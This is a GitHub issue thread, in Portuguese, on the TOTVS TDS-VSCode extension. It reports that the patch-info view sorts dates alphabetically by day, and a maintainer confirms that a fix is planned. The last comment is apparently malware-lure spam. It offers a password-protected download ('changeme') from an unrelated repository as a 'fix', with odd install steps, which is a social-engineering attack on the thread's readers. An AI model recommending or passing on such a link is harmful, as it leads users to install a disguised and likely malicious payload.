### ISSUE TITLE
Problema na ordenação de data de patches

### ISSUE THREAD

**Issue by gtrabach** [totvs/tds-vscode#1262]
**Describe the bug**
Ao visualizar as informações de um patch e clicar em ordenar por data, a ordenação está ocorrendo por dia apenas, e não pela data e hora completa.

Observe o exemplo abaixo. O fonte TAFA279 possui data de 31/10/2023, logo abaixo dele está sendo exibido o fonte TAFDIAPPR que possui data de 31/08/2017 e só então são exibidos fontes com datas mais recentes, como o ENGXFUNP com data de 31/07/2024.

![image](https://github.com/user-attachments/assets/abf681a4-f862-478d-807d-ef8e0a9cff71)

**To Reproduce**
1. Inicie o processo de aplicação de patches.
2. Selecione um patch que contenha fontes de vários meses ou anos diferentes. Ou use o patch enviado em anexo.
3. Clique em Patch Info após validação do patch e ordene por data (seja crescente ou decrescente).
4. Observe que a lista está sendo ordenada considerando apenas o primeiro dia (de 01 a 31 e vice versa), sem levar em consideração meses ou anos

**Expected behavior**
Ordenar a listagem utilizando a data completa (dia, mês, ano e hora).

**Screenshots**

**Desktop (please complete the following information):**
Windows 11 Pro 21H2 - 64 bits

**Appserver (please complete the following information):**
AppServer: 7.00.210324P-20240219 - 64 bits - 20.3.2.5
Windows 11 Pro 21H2 - 64 bits

[24-07-31_ATUALIZACAO_12.1.2310_TAF_EXPEDICAO_CONTINUA.zip](https://github.com/user-attachments/files/16767361/24-07-31_ATUALIZACAO_12.1.2310_TAF_EXPEDICAO_CONTINUA.zip)
[Logs TDS.zip](https://github.com/user-attachments/files/16767386/Logs.TDS.zip)

**Comment by lwtnb-wrk** [comment]
@gtrabach Grato por apontar este problema. 
Ele já estava mapeado e será corrigido em uma atualização futura na interface. A saber, o problema está ocorrendo pois a ordenação está tratando apenas o "texto" da data, ou seja, está ordenando de forma alfabética.

Não iremos corrigir isso agora, pois já está prevista a correção futura.
Se tiverem outras questões, por favor abra novas issues e vamos avaliar todas elas.
De qualquer forma, grato por apontar este problema.

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
